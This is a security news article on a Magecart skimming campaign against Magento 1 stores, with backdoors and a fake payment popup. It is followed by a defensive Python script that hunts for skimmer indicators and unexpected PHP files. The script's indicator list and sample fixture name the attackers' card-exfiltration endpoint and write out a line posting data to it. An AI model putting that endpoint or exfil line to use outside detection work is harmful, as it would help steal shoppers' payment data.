In a nutshell: Magecart has struck again, and e-commerce sites are in a terrible pickle this time. The hacking groups have hit online businesses with malware intended to skim customer transaction information, which is nothing new. What is new is that the malicious code also opened at least 19 backdoors in the stores so that if admins remove it, hackers can quickly get back into the site.
Security researchers at Sansec say that they discovered that more than 500 online stores running the Magento 1 e-commerce platform were compromised in January. The hackers used a combination of SQL injection (SQLi) and PHP Object Injection (POI) to take over the Magento platform. Then a domain called "naturalfreshmall" served the malware to the now vulnerable sites.
"The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," Sansec (@sansecio) tweeted on January 26, 2022. "Payments are sent to https://naturalfreshmall[.]com/payment/Payment.php."
With control over Magento, specifically through a plugin called "Quickview," Magecart executed a man-in-the-middle attack: malware posing as a payment popup skimmed transaction data and sent it to Magecart-controlled servers.
Furthermore, the malicious payload contained files that created at least 19 backdoors into the websites, so removing the skimmer alone is not an effective mitigation. Administrators must first identify and remove every backdoor and then patch the compromised CMS.
Sansec says the vulnerability lies in a deprecated version of the Magento 1 software from 2020. To patch their payment platforms, admins need to upgrade to the newest version of Adobe Commerce or apply the Magento 1 patches available for download from the OpenMage project.
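Because the payload drops extra files, cleanup has to start from a file inventory rather than from the skimmer itself. The following is an added example, not code from Sansec or the article: it walks a Magento docroot, flags any file containing the exfiltration indicators quoted above, and flags PHP files that are missing from, or differ from, a baseline of hashes assumed to have been taken from a clean install (the sample docroot and baseline are constructed in the script).

```python
"""Hunt for skimmer indicators and unexpected PHP files in a Magento 1 docroot."""
import hashlib
import os
import tempfile

# Indicators from the Sansec tweet quoted in the article (defanged domain restored).
SKIMMER_INDICATORS = (b"naturalfreshmall", b"/payment/Payment.php")


def scan_docroot(root, baseline):
    """Return (skimmer_hits, unexpected_php), both sorted lists of paths relative
    to root. baseline maps relative path -> sha256 of the known-good file; any
    .php/.phtml file absent from it or with a different hash is a backdoor candidate."""
    skimmer_hits, unexpected_php = [], []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, "rb") as fh:
                data = fh.read()
            if any(ind in data for ind in SKIMMER_INDICATORS):
                skimmer_hits.append(rel)
            if name.endswith((".php", ".phtml")):
                if baseline.get(rel) != hashlib.sha256(data).hexdigest():
                    unexpected_php.append(rel)
    return sorted(skimmer_hits), sorted(unexpected_php)


def build_sample_docroot():
    """Construct a tiny docroot (sample data, not a real store) plus its baseline."""
    root = tempfile.mkdtemp()
    clean_index = b"<?php echo 'storefront';"
    clean_mage = b"<?php // original framework bootstrap"
    files = {
        "index.php": clean_index,                      # untouched, in baseline
        "app/Mage.php": clean_mage + b"\n// injected",  # tampered, hash differs
        "media/tmp/cache.php": b"<?php // not in baseline",  # dropped file
        "js/quickview.js": b"post('https://naturalfreshmall.com/payment/Payment.php')",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    baseline = {"index.php": hashlib.sha256(clean_index).hexdigest(),
                "app/Mage.php": hashlib.sha256(clean_mage).hexdigest()}
    return root, baseline


if __name__ == "__main__":
    docroot, known_good = build_sample_docroot()
    hits, php = scan_docroot(docroot, known_good)
    print("skimmer indicators in:", hits)
    print("unexpected PHP files:", php)
```

On a real store the baseline should come from a pristine copy of the same Magento release and patch level, and a hit list is the starting point for removal, not the whole of it.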